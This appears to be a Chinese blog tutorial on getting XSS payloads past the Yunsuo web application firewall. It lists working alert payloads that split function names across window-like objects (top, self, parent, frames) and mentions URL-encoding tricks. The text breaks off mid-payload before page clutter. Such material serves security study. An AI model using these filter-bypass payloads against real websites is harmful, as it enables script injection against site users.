XSS Payload绕过云锁学习

本文介绍了如何绕过云锁等WAF的XSS过滤,包括Bypass策略、parseInt和toString方法的利用、eval函数的扩展以及各种编码技巧。通过实例展示了如何构造payload,如使用setTimeout和setInterval,以及通过DOM注入外部JS。最后提到了constructor属性的使用和更多拆分payload的方法。
摘要由CSDN通过智能技术生成

前言

对于我这个菜鸟来说,我通过谷歌百度学习到很多前辈的资料,甚至每句话都是他的指导,我也很感激前辈的为我们铺设的道路,让我们更快的成长起来。我也乐于分享,可能有些知识点过于单调或者久远,请见谅。

WAF


前几天花了10买了一个月的服务器,换个WAF来测试。 

Bypass

遗漏标签就不测试了,上一篇水文[https://www.anquanke.com/post/id/176185]的分享的标签也可以过,不信找几个试试= =

好吧非常打脸,拦截了。

然而换个prompt()函数???免费版当然是这样的啦,高级服务不仅我买不起,还绕不过啊,而且我不是真正的站长,规则我也不会设啊,总之就是这也不会那也不会。

 

Top属性类似的补充


还记得上篇的top属性嘛

实际上可以利用的还有好几个,看到这里各位是否get到什么了。

我们可以利用的类似拼接的对象又多了几个,例如:

//一家人就是要整整齐齐
<details open οntοggle=top['al'%2B'ert'](1) >
<details open οntοggle=self['al'%2B'ert'](1) >
<details open οntοggle=parent['al'%2B'ert'](1) >
<details open οntοggle=frames['al'%2B'ert'](1) >
<details open οntοggle=content['al'%2B'ert'](1) >
<details open οntοggle=window['al'%2B'ert'](1) >

这些都可以绕过waf,总结起来有 top self parent frames content window,无疑top是最短的,所谓短小精悍,这里借用PKAV的一张ppt。

 

其他补充

除了拆分构造,我们必须要了解还有编码,这个确实是老生常谈的话题,先看个例子吧

将e字母url编码,成功弹窗也绕过waf。 <details open ontoggle=top['

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值